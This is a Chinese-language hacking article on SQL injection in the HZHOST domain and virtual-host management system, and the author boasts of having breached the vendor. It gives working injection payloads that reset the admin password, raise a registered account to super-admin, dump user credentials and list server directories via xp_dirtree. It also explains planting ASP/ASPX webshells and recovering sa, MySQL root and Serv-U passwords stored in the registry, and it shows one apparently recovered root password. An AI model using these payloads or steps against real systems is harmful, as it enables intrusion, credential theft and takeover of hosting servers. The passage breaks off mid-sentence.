HZHOST域名虛擬主機(jī)管理系統(tǒng)sql注射漏洞+進(jìn)一步利用.doc

這是一個(gè)域名主機(jī)實(shí)時(shí)管理系統(tǒng)。在百度搜索： title: (域名主機(jī)實(shí)時(shí)管理系統(tǒng)) ，會(huì)找到大量采用這種系統(tǒng)的網(wǎng)站！太術(shù)語(yǔ)了。就是在線(xiàn)開(kāi)通ftp.sql.web的一個(gè)管理系統(tǒng)。一套web程序。和IIS管理程序。實(shí)現(xiàn)在線(xiàn)開(kāi)通的玩 意。所以：我們可以免費(fèi)申請(qǐng)域名和空間！哈哈！web程序方面寫(xiě)的非常嚴(yán)謹(jǐn)。大量的過(guò)濾。由于是商業(yè)版的程序，所以我沒(méi)有源碼。本來(lái)是有的，但是放在家里的電腦上。放暑假時(shí)搞的shell現(xiàn)在都被刪了。我現(xiàn)在又比較懶，就沒(méi)去弄源代碼。反正大家知道怎么弄的就行了。這又是一個(gè)文本框的注射。我真不知道作者是怎么想的。其他地方都被過(guò)濾了。就留下域名管理這里沒(méi)過(guò)濾。官方放暑假的時(shí)候就被我搞了一遍，過(guò)了一個(gè)月他發(fā)現(xiàn)了。刪了我的shell。不知道他怎么知道我從那里下的手搞的他。他居然補(bǔ)了漏洞。先上圖，再說(shuō)下利用方法。123 UPDATE memlst SET u_pss=e10adc3949ba59abbe56e057f20f883e WHERE u_nme=admin-這一句是把用戶(hù)admin的密碼修改為123456。管理員的后臺(tái)地址一般是/master或者直接在首頁(yè)登陸了按切換到管理員后臺(tái)。如果admin不是超級(jí)管理員，那就有三個(gè)辦法。一是自己構(gòu)造語(yǔ)句爆出來(lái)。二是提升自己注冊(cè)的用戶(hù)的權(quán)限。三是直接爆網(wǎng)站路徑，再來(lái)個(gè)差異備份。第一個(gè)方法我給出一條示范語(yǔ)句：123 and (select top 1 isnull(cast(u_nme as nvarchar(4000),char(32)+char(94)+isnull(cast(U_pss as nvarchar(4000),char(32) from (select top 2u_nme,U_pss from hzhost.memlst where 1=1 order by u_nme) t order by u_nme desc )0- and 1=1可以同時(shí)爆出一個(gè)用戶(hù)的帳號(hào)和密碼。想爆出其他用戶(hù)的語(yǔ)句自己構(gòu)造吧。第二個(gè)方法是：123 UPDATE memlst SET u_sys=6 WHERE u_nme=你注冊(cè)的用戶(hù)名-123 UPDATE memlst SET u_pwr=2 WHERE u_nme=你注冊(cè)的用戶(hù)名-這2句話(huà)就能夠提升自己為超級(jí)管理員第三個(gè)方法很麻煩。但是很有效果。直搗黃龍。很強(qiáng)大。我給出如下語(yǔ)句，大家自己研究去吧！爆路徑語(yǔ)句第一步：建立表123 ;drop table foofoofoo;create table foofoofoo(id int identity (1,1) not null,name nvarchar (300) not null,depth int not null,isfile nvarchar (50) null);- and 1=1第二步：123 ;declare z nvarchar(4000) set z=0x63003a005c00 insert foofoofoo execute master.xp_dirtree z,1,1- and 1=1注意：0x63003a005c00 = C: 為sql ENCODE其他的自己找工具去轉(zhuǎn)吧！第三步：暴出總數(shù) 123 and (select cast(count(*) as varchar(8000)+char(94) from foofoofoo)0- and 1=1第四步：暴出你想要的文件夾名字和文件名字 123 and 0(select top 1 cast(isfile as nvarchar(4000)+char(94)+cast(name as nvarchar(4000) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)- and 1=1修改中間紅色的1，依次爆出。至于差異備份語(yǔ)句。讓nbsi3告訴你吧。對(duì)HZHOST域名虛擬主機(jī)管理系統(tǒng)sql注射漏洞進(jìn)一步利用！我記得還有2篇關(guān)于hzhost的漏洞利用文章。名字不記得了。大家去搜索“hzhost漏洞”找找吧！里面提到下面兩點(diǎn)內(nèi)容！1。是提到c:windowstemp下有hzhost主機(jī)留下的ftp登陸記錄。有用戶(hù)名和密碼2。是利用hzhost拿系統(tǒng)主機(jī)最高權(quán)限的。安裝了hzhost的主機(jī),其mssql sa密碼,mysql root密碼還有serv-u的administrator密碼全部保存在注冊(cè)表中。位置在HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmysqlpassHKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmastersvrpass經(jīng)過(guò)了hzhost自己的加密方式，象eLVClO4tzsKBf#dee52443a3872cc159這樣的字符串。不過(guò)在hzhost后臺(tái)可以還原！拿到了sa密碼，或者root密碼，最高權(quán)限就在眼前！禁止了w.s的話(huà)。大家就傳aspx木馬導(dǎo)撒！我們傳了一個(gè)asp木馬上去后。在incsconstr.asp下面可以看到數(shù)據(jù)庫(kù)連接串。然后連接到數(shù)據(jù)庫(kù)。通過(guò)執(zhí)行SELECT * FROM hstlst語(yǔ)句?？梢钥吹胶芏嘀鳈C(jī)記錄。如圖發(fā)現(xiàn)什么沒(méi)有？h_ftppass的密碼和hzhost主機(jī)自己的加密串很相似。沒(méi)錯(cuò)，主機(jī)管理的密碼也是經(jīng)過(guò)他自己的加密方式加了密！而我們?cè)谥鳈C(jī)管理的地方！看到明文密碼。說(shuō)明他又給還原回來(lái)了。明白了么？我們先通過(guò)aspx木馬導(dǎo)出mysql，mssql的root,sa密碼加密串后。我們通過(guò)這條語(yǔ)句，修改別人的主機(jī)密碼。UPDATE hstlst SET h_ftppss=aPWw3j4zMaK83lHMBof9fc298b1d3d0a WHERE h_ID=10000471然后回過(guò)頭去看主機(jī)密碼。（這時(shí)候被轉(zhuǎn)成了明文）就拿到了root密碼為：sphil_070921注意：由于有多種限制。我截的